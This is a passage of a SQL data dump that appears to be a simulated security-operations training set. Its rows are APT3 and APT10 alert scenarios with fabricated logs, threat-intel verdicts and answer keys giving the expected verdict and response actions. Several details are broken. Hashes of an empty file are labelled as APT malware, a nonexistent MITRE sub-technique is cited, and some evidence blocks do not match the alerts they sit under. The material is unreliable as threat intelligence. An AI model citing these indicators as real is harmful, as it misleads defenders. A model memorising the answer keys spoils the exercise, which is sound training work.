AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(386, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'To ensure continued access to the infected system, APT3 modifies registry settings. This registry modification allows their malware to persist even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:17Z\",\"event_id\":4657,\"event_type\":\"Registry Modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"user\":\"SYSTEM\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value_name\":\"APT3PersistentService\",\"modified_value_data\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Temp\\\\malicious.dll,EntryPoint\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT3 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Vendor\",\"verdict\":\"malicious\",\"details\":\"DLL identified as APT3 persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(387, 'Lateral Movement through Credential Dumping', 'high', 'Network Traffic Analysis', 'APT3 has initiated lateral movement within the network by utilizing credential dumping techniques. The attacker has successfully accessed additional systems using stolen credentials, aiming to expand their reach within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"event_type\":\"credential_dumping\",\"username\":\"jdoe\",\"dumped_file\":\"NTDS.dit\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement_attempt\",\"protocol\":\"SMB\",\"network_segment\":\"internal\",\"alert_id\":\"alert_10234\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(388, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, APT3 attempts to exfiltrate sensitive data using encrypted channels, aiming to evade detection mechanisms. The operation was detected when unusual encrypted traffic was observed between internal host 192.168.1.45 and an external IP address 203.0.113.5. The malicious file \'encrypted_payload.zip\' with hash \'d41d8cd98f00b204e9800998ecf8427e\' was involved in the exfiltration attempt.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"file_name\":\"encrypted_payload.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"blocked\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host participating in exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_payload.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File involved in suspected data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(389, 'Initial Access via Compromised MSP Credentials', 'high', 'Authentication Logs', 'APT10 exploits stolen credentials from a managed service provider to infiltrate the aerospace company\'s network, setting the stage for a prolonged espionage campaign. Anomalous login detected from an external IP address using compromised MSP credentials.', 'Credential Theft', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:00Z\",\"event_type\":\"authentication_attempt\",\"username\":\"msp_admin@aerospacecompany.com\",\"auth_status\":\"success\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"password\",\"event_id\":\"auth-789654\",\"mfa_status\":\"not_required\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"msp_admin@aerospacecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised managed service provider credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor activities.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal aerospace company network IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(390, 'Execution Using DLL Side-Loading', 'high', 'Application Logs', 'The threat actors employ DLL side-loading to execute their malicious code under the guise of trusted applications, evading traditional detection mechanisms.', 'Execution', 'T1073.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4624\",\"application\":\"legitapp.exe\",\"loaded_dll\":\"msvcr110.dll\",\"original_dll_path\":\"C:\\\\Program Files\\\\LegitApp\\\\msvcr110.dll\",\"malicious_dll_path\":\"C:\\\\Temp\\\\msvcr110.dll\",\"executing_user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.45\",\"hash_malicious_dll\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_name\":\"APT10_SideLoad\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"msvcr110.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a malicious DLL used in side-loading attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT10_SideLoad malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT10 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(391, 'Establishing Persistence with Backdoor Implant', 'high', 'System Registry Changes', 'APT10 has been detected establishing long-term persistence by deploying a backdoor implant within the aerospace company\'s network. The attack involved registry modifications pointing to a malicious service executable.', 'Persistence', 'T1050: New Service', 1, 'new', NULL, '{\"time\":\"2023-09-15T14:23:45Z\",\"event_id\":7045,\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"registry_key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\MaliciousService\",\"service_name\":\"MaliciousService\",\"image_path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Service Installed\",\"description\":\"A new service was installed on the machine to maintain persistence.\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Executable file used by APT10 for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT10 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 